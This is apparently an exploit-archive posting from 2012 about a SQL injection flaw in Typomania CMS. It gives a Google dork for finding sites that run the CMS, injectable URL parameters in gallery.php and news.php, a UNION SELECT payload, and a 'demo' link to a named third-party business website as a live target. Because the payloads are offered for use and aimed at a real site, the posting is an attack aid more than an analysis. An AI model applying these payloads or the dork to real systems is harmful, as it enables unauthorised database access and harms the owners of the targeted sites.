Typomania CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
b3d067dd4b96d54ef6df5fa0521a467cc3b287fa4f8e3165e20e72dcf5f149c0
###################################################################################
# Exploit Title: Typomania CMS cms Sql Injection Vulnerability
#
# Google Dork:intext:"powered by Typomania CMS"
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home :
http://www.typomania.co.uk/typomania/products/typomania-service-plans/
#
# Tested on: all
#
###################################################################################
$
$ ----Author will be not responsible for any damage----
$
###################################################################################
========================================
http://www.target.com/gallery.php?id=[id]'
http://www.target.com/news.php?item_id=[id]'
+union+select+version()--
D3M0 :
http://www.wildarttaxidermy.co.uk/news.php?item_id=27
===============Crim3R@Att.Net===========
$home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir